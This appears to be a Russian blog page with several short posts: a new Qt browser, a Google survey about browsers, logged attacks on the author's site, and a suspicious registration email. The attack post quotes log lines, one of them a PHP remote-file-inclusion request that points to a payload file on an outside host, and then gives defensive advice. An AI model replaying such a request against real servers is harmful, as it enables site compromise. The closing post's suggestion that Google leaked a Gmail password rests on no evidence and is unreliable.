Очередной ответ Чемберлену

Полку браузеров прибыло. Поклонники Qt (и не только) могут порадоваться появлению нового кросс-платформенного браузера: Arora.

Возможности

Список возможностей и скриншоты есть тут.
Он действительно впечатляет:

Читать далее

Браузер? Браузер!

Google решил выяснить, знают ли люди, что такое “браузер?”. Менее 8% американских респондентов смогли ответить, что это такое..

Гугл даже создал сайт, чтобы помочь американцам понять различие между браузером и гуглом поисковым движком.

Скрипткиды или боты

Хакеры, а точнее скрипткиды, не спят. Несколько дней назад на мой сайт начали проводиться попытки атак запросами, эксплуатирующими старую уязвимость в PHP.

/var/log/messages:
Oct  4 03:23:34 220 suhosin[28420]: ALERT — tried to register forbidden variable ‘_SERVER[DOCUMENT_ROOT]‘ through GET variables (attacker ‘77.242.37.212‘, file ‘/xxx/domain.tld/index.php’)

Пример запроса (из лога апача):
211.111.213.195 — — [05/Oct/2009:08:26:22 +0300] «GET //?_SERVER[DOCUMENT_ROOT]=https://www.hotlinkfiles.com/files/2380695_oajch/IDtest.txt??? HTTP/1.1» 302 — «-» «Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)»

Файл IDtest.txt все еще доступен для скачивания. Видимо никто еще на него не жаловался или хостинг игнорирует абузы.

Как защититься?

a) обновите PHP;
b) не включайте register_globals (оставьте Off);
c) дополнительно можете пользоваться патчем/модулем suhosin.

Spam from Google and GMail – spamvertising practice

На днях партнер сообщил мне, что у него в почтовом ящике, который обслуживается почтовыми серверами  Google, появилось подозрительное письмо с рекламой Deskzilla. Я подумал, что это обычный спам, т.к. его почтовый ящик можно без труда выловить в поисковиках, а значит он мог быть проиндексирован каким-нибудь ботом, собирающим адреса e-mail для базы спаммера.

Сегодня одно письмо удивило уже меня: с сайта nukeuploads.com пришло письмо, что я успешно там зарегистрировался, при чем был указан мой адрес в системе GMail и (!) мой пароль от ящика GMail.

Spam or not?

Есть только две причины появления таких писем:  Гугл сам выдал конфиденциальную информацию (адрес e-mail и пароль) своему партнеру (или рекламодателю) или у почтовой системы Google / GMail есть серьезная брешь в безопасности. Во втором я сомневаюсь 🙂

Читать далее